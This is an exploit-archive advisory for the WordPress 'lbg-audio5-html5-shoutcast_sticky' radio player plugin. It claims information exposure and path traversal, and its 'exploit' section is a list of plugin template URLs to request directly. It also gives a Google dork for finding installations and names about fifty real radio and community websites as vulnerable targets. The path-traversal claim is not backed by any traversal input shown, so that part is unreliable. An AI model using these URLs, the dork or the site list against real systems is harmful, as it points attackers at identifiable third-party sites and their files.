WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x File Information Exposure

#########################################################################################

# Exploit Title : WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com
# Software Download Link :
codecanyon.net/item/sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player/17162755
codecanyon.net/item/sticky-radio-player-full-width-shoutcast-and-icecast-html5-player/16897465
# Software Price : 15$ and 19$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : From 3.0 to 4.9.x
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

#########################################################################################

# Impact :
********

* WordPress lbg-audio5-html5-shoutcast_sticky 4.9.x and other versions is prone to an arbitrary file disclosure 

vulnerability because it fails to properly sanitize user-supplied input.

* An attacker can exploit this vulnerability to view local files in the context of the web server process, 

which may aid in launching further attacks. 

* An information exposure is the intentional or unintentional disclosure 

of information to an actor that is not explicitly authorized to have access to that information.

* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* The software uses external input to construct a pathname that is intended to identify a file or 

directory that is located underneath a restricted parent directory, but the software does not 

properly neutralize special elements within the pathname that can cause the pathname 

to resolve to a location that is outside of the restricted directory.

#########################################################################################

# Exploit :
***********************

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Categories

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/categories.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_player.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_playlist_record.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Manage_Players

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Add_New

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/overview.php?page=LBG_AUDIO5_HTML5_SHOUTCAST_Help

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/help.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/players.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/preview.html

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/playlist.php

/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/settings_form.php

#########################################################################################

# Video Tutorials

Installation - youtube.com/watch?v=AnhaPcIZUjc
Manage the Categories and Playlist - youtube.com/watch?v=pZynu26UKbs
How to insert the player into your website - youtube.com/watch?v=RY3ikHSdTNg

#########################################################################################

# Example Vulnerable Sites :
*************************

[+] frissfm.ro/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiopela.mk/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] onadesants.cat/wp/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] pensereal.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] ukieradio.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] giveme5prod.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radyomedya.com.tr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioplus.org.uk/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] thespyfm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] mensajerofm.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] fmcidadejardim.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] fondationfemidejabat.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] superlivefm.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] unicolegio.com/home/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioe.net/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioarcadie.net/cercle/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] santaupdate.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] sahinfm.com.tr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] horebradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiobanglanet.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiosantacruz.com.br/online/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] proyectovidamcym.com.uy/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiokontho.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] joltradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] misionvidainternacional.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radio7.co.tz/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] dizzimonline.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] caraotaradio.net/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] escandalofm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] koswradio.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radio-busovaca.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] joltradio.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] eldesconcierto.com.ar/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] gunbitas.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] canarinhofm.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] resguardoicl.org/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiovioladeouro.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] cadenaradialjupiter.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radyo-anadolu.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] buenaventuraenlinea.com/bradio/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] elfhq.com/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioserbona.rs/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] renewx.gq/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radiociresarii.ro/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] vibez24.com.ng/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] lol-corsica.fr/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] confidencialacesse.com.br/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] radioparaisofm.cl/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] lapicosa.com.mx/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

[+] caraotaradio.ml/wp-content/plugins/lbg-audio5-html5-shoutcast_sticky/tpl/add_category.php

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################